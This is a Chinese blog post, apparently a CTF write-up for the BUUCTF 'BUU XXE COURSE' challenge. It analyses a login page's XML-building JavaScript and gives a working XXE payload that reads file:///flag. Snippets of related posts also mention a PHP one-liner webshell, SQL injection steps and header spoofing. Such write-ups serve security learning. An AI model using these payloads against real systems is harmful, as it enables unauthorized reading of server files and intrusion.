BUU XXE COURSE

已于 2022-03-25 17:23:15 修改
阅读量1k 收藏 1
点赞数
分类专栏: CTF 文章标签: php 安全 web安全
于 2022-03-25 17:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62414126/article/details/123731384
版权

发现输入的username被alert了
查源码

onclick="XMLFunction()"

在这里插入图片描述抓包看xml格式
在这里插入图片描述回来看控制台
发现js的xml应用

<script type="text/javascript">
        function XMLFunction(){
            var xml = '' +
                '<?xml version="1.0" encoding="UTF-8"?>' +
            '<root>' +
            ' <username>' + $('#username').val() + '</username>' +
            ' <password>' + $('#password').val() + '</password>' +
            ' </root>';
            var xmlhttp = new XMLHttpRequest();
            xmlhttp.onreadystatechange = function () {
                if(xmlhttp.readyState == 4){
                    console.log(xmlhttp.readyState);
                    console.log(xmlhttp.responseText);
                    alert(xmlhttp.responseText);

                }
            }
            xmlhttp.open("POST","login.php",true);
            xmlhttp.send(xml);
        };
    </script>

构造xxe攻击
在这里插入图片描述这是post包传的时候记得把注释删去

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY flag SYSTEM "file:///flag"><!--构造实体-->
]>
<root>
<username>&flag;</username><!--输出flag实体-->
<password>2333</password>
</root>

flag{6866a844-3788-4a9d-9909-1d9d9943f56f}

buuctf 简单学习xxe
m0_46580995的博客
11-08 1344
buuctf 抓包发现可以xxe payload <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file://文件"> ]> <user> <username>&file;</username> <password>hack</password> </user&g
BUUCTF - Basic
weixin_39505091的博客
07-06 1242
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。发现有个 ctftraining 数据库,查找该数据库下的表,果然找到了有个 flag表,该表里有个flag字段。文件上传漏洞,上传一个php一句话木马文件,返回了文件的访问路径,再用蚁剑连接,即可在根目录找到flag。2. 本来这样是没啥办法的,但是我们访问这个木马文件,发现这个文件其实是被执行了,输出了 hello;
BUU XXE COURSE 1 【basic】
weixin_52942048的博客
10-07 513
看到username取到了admin变量的内容。发现请求参数是xml格式。
BUUCTF/BUU XXE COURSE 1
weixin_44041994的博客
03-22 1249
xxe全称是"xml external entity injection",意为xml外部实体注入。服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。通过brup suite抓包发现,数据包上传的是xml数据。随意输入数据并登录,发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag,闯关成功。
XXE之执行命令 BUU XXE COURSE 1
weixin_73049307的博客
10-03 832
接下来就直接读取flag文件(用SYSTEM "file:///flag")执行命令。其实上一部分的XXE之探测内网端口的例题就用到了执行命令的知识SYSTEM ""发现onclick事件触发XML_Function()函数,说明传输方式是XML。先输入admin 123456,点击“GO!F12查看一下按键“GO!说明存在XXE-XML漏洞。
BUU XXE COURSE 1 1
最新发布
01-30
### 关于BUU XXE Course Materials #### XML外部实体漏洞概述 XML外部实体(XXE)漏洞允许攻击者通过利用应用程序解析XML输入的方式,读取本地文件、执行远程代码或发起其他类型的攻击。在某些情况下,如果应用程序...
XXE学习(with BUU XXE COURSE1)
I_ET5u5的博客
04-13 618
进行一个XXE的学
BUU XXE COURSE 1 1 解题过程
weixin_42515203的博客
06-23 948
CTF题目之BUU XXE COURSE 1 1,涉及的XML注入问题
BUUCTF Basic 解题记录--BUU XXE COURSE
weixin_43171033的博客
10-08 707
2、了解了XXE漏洞,用burpsuite获取到的url转发给repeater,修改XML的信息,引入外部实体漏洞,修改发送内容,即可查看到flag信息。定义admin的外部实体,里面的命令是查看flag的信息。
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 570
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
BUU XSS COURSE 1
分享
07-27 2577
BUU XSS COURSE 1
BUU LFI COURSE 1-1
fdmssmf的博客
08-05 3046
BUU LFI COURSE 1 1 直接url后面添加/?file=/flag
buuctf [PHP]XXE
qq_1873822的博客
03-14 4150
原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息。仅仅是纯文本,有能力处理纯文本的软件都可以处理 XML。XML 允许创作者定义自己的标签和自己的文档结构。XML 是独立于软件和硬件的信息传输工具。所有现代浏览器都有读取和操作 XML 的内建 XML 解析器,但是不同的浏览器解析的方法不一样的,如在IE中使用loadXML()方法,在其他
BUU BURP COURSE 1【basic】
weixin_52942048的博客
10-07 985
(2) remote_addr、X-Real-IP、X-Forwarded-For,这3个头参数需要详细了解。(1) 看到这里估计就蒙了,这怎么玩?这提示就是伪造一个本地请求,就是头信息中传一个127.0.0.1;
XXE漏洞】buu_[NCTF2019]Fake XML cookbook
serendipity1130的博客
09-11 350
[NCTF2019]Fake XML cookbook XXE漏洞 学习文章:XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook-布布扣-bubuko.com XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 1.抓包发现里面存在一个X
BUUCTF--BUU XSS COURSE
qq_46263951的博客
07-18 4261
吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1518
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
BUUCTF Basic 解题记录--BUU BURP COURSE 1
weixin_43171033的博客
10-08 1556
6、点击登录,在proxy截获的头信息中添加上本地登录的信息 X-Real-IP:127.0.0.1,再转发即可得到flag,成功。3、将proxy的信息转到repeater区域,尝试看看有什么结果,发现有一个默认用户名和密码的登录界面。2、应该使用X-Real-IP,将这里的IP设置成127.0.0.1不就是本地访问了吗,哈哈哈。4、将标红的一段 X-Real-IP:127.0.0.1 加到proxy中,再转发。看题目就能想到肯定跟burpsuite工具相关,直接打开准备分析数据。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值